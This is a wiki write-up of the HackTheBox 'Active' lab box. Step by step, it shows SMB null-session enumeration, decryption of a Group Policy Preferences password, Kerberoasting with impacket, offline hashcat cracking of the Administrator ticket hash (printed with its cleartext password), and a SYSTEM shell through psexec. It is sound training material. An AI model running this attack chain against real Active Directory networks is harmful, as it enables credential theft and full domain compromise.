imported>Aghanim at 21:12, 28 January 2022

2022-01-28T21:12:40Z

New page

{{Infobox WriteUp
| name = Active
| platform = HackTheBox
| os = Windows
| difficulty = Medium
| techniques = SMB, GPP Passwords, Kerberoasting
}}

[[File:2022-01-image-121.png|thumb]]

This is a Active Directory box. Because of SMB null session, we found Group Policy Prefance encrypted password stored in '''cpassword'''. We decrypted that and got credentials for SVC_TGS. Using these credentials we '''kerberoasting '''technique to get hash for the user Administrator. I then cracked that hash, and used '''psexec '''to gain shell on the machine.

----

== Enumeration ==

I'll start with a NMAP scan.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# nmap -sC -sV -p- --min-rate 10000 10.10.10.100 -oN nmap.result
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-22 21:18 EST
Nmap scan report for 10.10.10.100
Host is up (0.030s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-23 02:20:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49170/tcp open msrpc Microsoft Windows RPC
49171/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1m54s
| smb2-security-mode:
| 2.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2022-01-23T02:21:29
|_ start_date: 2022-01-23T02:16:58

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.23 seconds

</syntaxhighlight>

The services running on the machine is:

{| class="wikitable"
|-
! Port
! Service
! Explaination
|-
| 53
| DNS
| Domain name system. Translate IP to domain.
|-
| 88
| Kerberos
| Kerberos is an authenticaiton protocol.
|-
| 135
| RPC
| Protocol that uses the client-server model in order to allow one program to request service from a program on another computer.
|-
| 139
| netbios-ssn
| Network Basic I/O system. Provides services related to the session layer.
|-
| 389
| AD LDAP
| Lightwegiht Directory Access Protocol. Protocol to locate organizations, individuals, and other resources such as files and devices in a network.
|-
| 445
| microsoft-ds (SMB)
| Service Message Block. Application layer network protocol primarily used for offering shared access to files, printers, serial ports, etc
|-
| 464
| kpasswd5?
| Used for chaning/setting passwords against Active Directory.
|-
| 593
| ncacn_http
| Identifies IIS as the protocol family for the endpoint.
|-
| 3268
| AD LDAP
| Same as port 389
|-
| 5722
| msrpc
| same as 135
|-
| 9389
| mc-nmf
| Message Framing protocol
|}

Right off the bat we can note that the domain is '''active.htb'''.

I'll start with listing shares that are available in SMB.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# smbclient -L //10.10.10.100
Enter WORKGROUP\root's password:
Anonymous login successful

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Replication Disk
SYSVOL Disk Logon server share
Users Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
</syntaxhighlight>

Enumerating the share''' Replication '''I found a XML file called '''Groups.xml'''.

<syntaxhighlight lang="bash">
──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# cat Groups.xml 1 ⨯

</syntaxhighlight>

In that file we get a service user '''SVC_TGS''' and a group policy preferance encrypted password. [https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-gppref/2c15cbf0-f086-4c74-8b70-1f2fa45dd4be?redirectedfrom=MSDN Microsoft released] the key for GPP encryption. Microsoft released a patch in 2014 preventing admins from putting passwords into GPP. The patch dosent do anything about passwords that were already available there.

=== Decrypting GPP password ===

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ 1 ⨯
GPPstillStandingStrong2k18
</syntaxhighlight>

So we have the credentials for the service account. '''SVC_TGS:GPPstillStandingStrong2k18'''.

From the earlier enumeration, I saw the share called '''Users'''. The user SVC_TGS have access to that share.

<syntaxhighlight lang="bash">
smb: \SVC_TGS\> ls
. D 0 Sat Jul 21 11:16:32 2018
.. D 0 Sat Jul 21 11:16:32 2018
Contacts D 0 Sat Jul 21 11:14:11 2018
Desktop D 0 Sat Jul 21 11:14:42 2018
Downloads D 0 Sat Jul 21 11:14:23 2018
Favorites D 0 Sat Jul 21 11:14:44 2018
Links D 0 Sat Jul 21 11:14:57 2018
My Documents D 0 Sat Jul 21 11:15:03 2018
My Music D 0 Sat Jul 21 11:15:32 2018
My Pictures D 0 Sat Jul 21 11:15:43 2018
My Videos D 0 Sat Jul 21 11:15:53 2018
Saved Games D 0 Sat Jul 21 11:16:12 2018
Searches D 0 Sat Jul 21 11:16:24 2018

5217023 blocks of size 4096. 277681 blocks available
smb: \SVC_TGS\> cd Desktop\
smb: \SVC_TGS\Desktop\> ls
. D 0 Sat Jul 21 11:14:42 2018
.. D 0 Sat Jul 21 11:14:42 2018
user.txt AR 34 Sat Jan 22 21:17:47 2022

5217023 blocks of size 4096. 277681 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \SVC_TGS\Desktop\> exit
</syntaxhighlight>

== Root ==

To get the credentials for '''Administrator '''account I'll use a technique called kerberoasting.

>
The goal of '''Kerberoasting''' is to harvest '''TGS tickets for services that run on behalf of user accounts''' in the AD, not computer accounts. Thus, '''part''' of these TGS '''tickets are''' '''encrypted''' with '''keys''' derived from user passwords. As a consequence, their credentials could be '''cracked offline'''. You can know that a '''user account''' is being used as a '''service''' because the property '''"ServicePrincipalName"''' is '''not null'''.

Therefore, to perform Kerberoasting, only a domain account that can request for TGSs is necessary, which is anyone since no special privileges are required.
[https://book.hacktricks.xyz/windows/active-directory-methodology/kerberoast https://book.hacktricks.xyz/windows/active-directory-methodology/kerberoast]

I'll use '''impackets '''GetUserSPN. Pentestlab have a great [https://pentestlab.blog/2018/06/04/spn-discovery/ blogpost] about Service Principle Names

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/svc_tgs -outputfile hashes.kerberoast 1 ⨯ 1 ⚙
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2022-01-22 21:18:00.883745
</syntaxhighlight>

I'll now attempt to crack the hash using hascat. Using hashcat on my host instead of Kali VM allowes me to use the GPU to crack the hash. Even though the hash is probably a password from rockyou, using hashcat with GPU is alot faster than using the CPU. GPU passthroug to VM with a consumer card is a hassle, so I havent done it.

C:\Users\AlaaG\OneDrive\Skrivebord\hashcat-6.2.4>hashcat -m 13100 --force -a 0 C:\Users\AlaaG\OneDrive\Skrivebord\hash.kerberoast.txt rockyou.txt hashcat (v6.2.4) starting ==================== * Device #1: NVIDIA GeForce RTX 3070 Laptop GPU, 7150/8191 MB, 40MCU OpenCL API (OpenCL 3.0 CUDA 11.5.125) - Platform #1 [NVIDIA Corporation] ======================================================================== * Device #2: NVIDIA GeForce RTX 3070 Laptop GPU, skipped OpenCL API (OpenCL 2.1 AMD-APP (3224.5)) - Platform #2 [Advanced Micro Devices, Inc.] ===================================================================================== * Device #3: AMD Radeon(TM) Graphics, 6624/13320 MB (4790 MB allocatable), 8MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 1 digests; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 421 MB Dictionary cache built: * Filename..: rockyou.txt * Passwords.: 14344391 * Bytes.....: 139921497 * Keyspace..: 14344384 * Runtime...: 0 secs $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$037f289324d5c77c9f1847bf3606e6c6$d1462adf2fb2dd4f89fe5b86993cf73a78103bcdf3d72e5fd629c77005eb512d9bc3ca959e7efba7041b7dae4662f058845ee19e91db9fcb479d671cd60663c69df89e33bff176d803e1cae39378521d208e54df913b8c22cd59f884624626234dadc6aa0f9e6550a583553e78944d017ea871fb966c98d99e2eda0889199407bd462d5f9fae457d8dd5a0b2e686d471fdfe78f94878a0e7e0b5d869b4b17e8539248dd2d86a783064fbb959495de4cb8fd8d9c03fa1f51f4ce8bbd3dc994629823c9ebc3eab68849b05988dc025341eb03869744b193b192e0daffd0b88789b3692300870dc88fe7a08bd3dc86a46151499f90e14836bc2f8f11b93544668356fbdac21b04a0db6d8dedcadb26e03546c65c4ad458d1976996f1ab95390ab298fc0209142747b7ec436d9117cbbd07917ef3b7d864374d936d40b9f16a2716fc075c8000ee8cd8343ce78093f2a6f59175ced3be477df0e2a9624c7bc9838d24909bf7e9bedee33a8361f205a0a5fa6821e5049f4eeee7c65bac97300097e865d086fb241b3180c3cf56d9b3e922e74b499bd5f0a392a2ebdc346bf66e7ff18819243726a4ca926623598e0d7b30be58dcdc972a6143a8591beb22772c506249691be84d0a035194404d560f304cfa636cadb921f06f80747beb82f2f67c9edf37652ad23412e658c7944d72e74cd3994ca40ba454e4a6883ad96d0bcd76c0ec284288fffd7d77ae5c164905915d31fe469a11464154e85bd5bf57592cf49691cf8935d93e65c049821b2272e2352d374ae7c61b7d181af37dc841b8008f5acb79a90270b298fdbbae92a3f11004f4cf5917751820089a9ad99ac607b139cbd0ccb6188ad7fa913fe8b732bc525c34dfbd44b7e27e5aa17da80e635f4f150024489c6ad225144218de4629d9caadf462897c551d6fbbccf53265cb09af16ade88b7ffc323f4861345a459a32531540c0d12ea080ec1ba284a61ad394d7eacee26ddb2317b299c97604905844ef9f499b7263714f324ed7d2fc5328af703968c5f07a08dbd4da65051e887723124d2ca7f1156e9bf04a738fe763069b842f53e7a53206295103a069c4452d071b040908c18ad167842f0dfe48527ac7d7d80a0060fe361d9947b06ba736ec87b87f919536ed2a3cf398f6b3d0a9b45fb50c345b4995dc746ad0746360cbb5ff593800a82f226f1d05fc41fbd2ee10cb18b85702a3580d012a113ab89eb37da7ac85053448fdfc81d8f0c8b495c:Ticketmaster1968 Session..........: hashcat Status...........: Cracked Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP) Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...8b495c Time.Started.....: Sun Jan 23 20:22:15 2022, (2 secs) Time.Estimated...: Sun Jan 23 20:22:17 2022, (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 3187.8 kH/s (1.07ms) @ Accel:128 Loops:1 Thr:32 Vec:1 Speed.#3.........: 2506.8 kH/s (8.84ms) @ Accel:256 Loops:1 Thr:32 Vec:1 Speed.#*.........: 5694.6 kH/s Recovered........: 1/1 (100.00%) Digests Progress.........: 10616832/14344384 (74.01%) Rejected.........: 0/10616832 (0.00%) Restore.Point....: 10190848/14344384 (71.04%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1 Restore.Sub.#3...: Salt:0 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: ace14325 -> TUGGAB8 Candidates.#3....: TUGGA00 -> Sabo2008 Hardware.Mon.#1..: Temp: 40c Util: 6% Core:1559MHz Mem:6994MHz Bus:8 Hardware.Mon.#3..: Util: 39% Core:2000MHz Mem:1600MHz Bus:16 Started: Sun Jan 23 20:21:41 2022 Stopped: Sun Jan 23 20:22:18 2022

</pre>

We now have the credentials for the administrator account, '''Administrator:Ticketmaster1968'''. I can now fetch the root.txt from SMB share.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# smbclient //10.10.10.100/Users -U "active.htb\Administrator" 1 ⨯ 1 ⚙
Enter ACTIVE.HTB\Administrator's password:
Try "help" to get a list of possible commands.
smb: \Administrator\Desktop\> ls
. DR 0 Thu Jan 21 11:49:47 2021
.. DR 0 Thu Jan 21 11:49:47 2021
desktop.ini AHS 282 Mon Jul 30 09:50:10 2018
root.txt AR 34 Sat Jan 22 21:17:47 2022

5217023 blocks of size 4096. 277665 blocks available
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
</syntaxhighlight>

=== Shell ===

To get a shell on the machine I'll use impackets '''psexec'''.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/active]
└─# impacket-psexec active.htb/Administrator@10.10.10.100 1 ⨯ 1 ⚙
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.100.....
[*] Found writable share ADMIN$
[*] Uploading file eUvcjiEp.exe
[*] Opening SVCManager on 10.10.10.100.....
[*] Creating service DzMt on 10.10.10.100.....
[*] Starting service DzMt.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>
</syntaxhighlight>

== What I've learned ==

* Before 2014 AD machines could have GPP encrypted passwords "hidden" in a file. * When pentesting an Active Directory environment there might be many ports open. Enumerating the low hanging fruit is key, so not to get lost or spending huge ammount of time enumerating services that might not have anything usesful. That dosent however mean not to enumerate well.

[[Category:HackTheBox]]
[[Category:Windows]]
[[Category:Write-ups]]

Write-ups/HTB/Active - Revision history

imported>Aghanim at 21:12, 28 January 2022